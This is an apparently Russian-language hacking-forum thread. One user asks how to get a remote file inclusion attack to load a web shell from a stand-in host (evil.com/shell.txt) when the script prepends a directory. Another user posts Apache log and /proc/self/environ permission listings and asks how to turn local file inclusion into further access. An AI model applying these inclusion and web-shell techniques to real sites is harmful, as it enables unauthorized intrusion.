извиняюсь если кто уже спрашивал

есть допустим rfi у меня, но в переменную куда я вбиваю адрес шелла добавляется в начало к примеру modules и поучается скрипт обрашается не к http://evil.com/shell.txt а непосредственно к modules/http://evil.com/shell.txt и весь rfi идет коту под хвост

как бороться с этим?

здесь получится только LFI. для вопросов по уязвимостям есть отдельная тема

Господа, а с этим что делать предложите?

total 68

-rw-r----- 1 root adm 25391 июля 21 13:42 access.log

-rw-r----- 1 root adm 32189 июля 21 13:42 error.log

-rw-r----- 1 root adm 0 июля 20 20:40 other_vhosts_access.log

lao@lao-S:/var/log/apache2$

lao@lao-S:/proc/self$ ls -l | grep environ

-r-------- 1 lao lao 0 июля 21 13:42 environ

lao@lao-S:/var/www$ ls -l

total 4

drwxr-xr-x 2 root root 4096 июля 20 21:02 html

​И это не какие-то хитрые настройки крутого админа, это по дефолту. если дать всем права хотя бы на чтение логов, то всё относительно не плохо. А так большая саSAMBA получается. Есть идеи?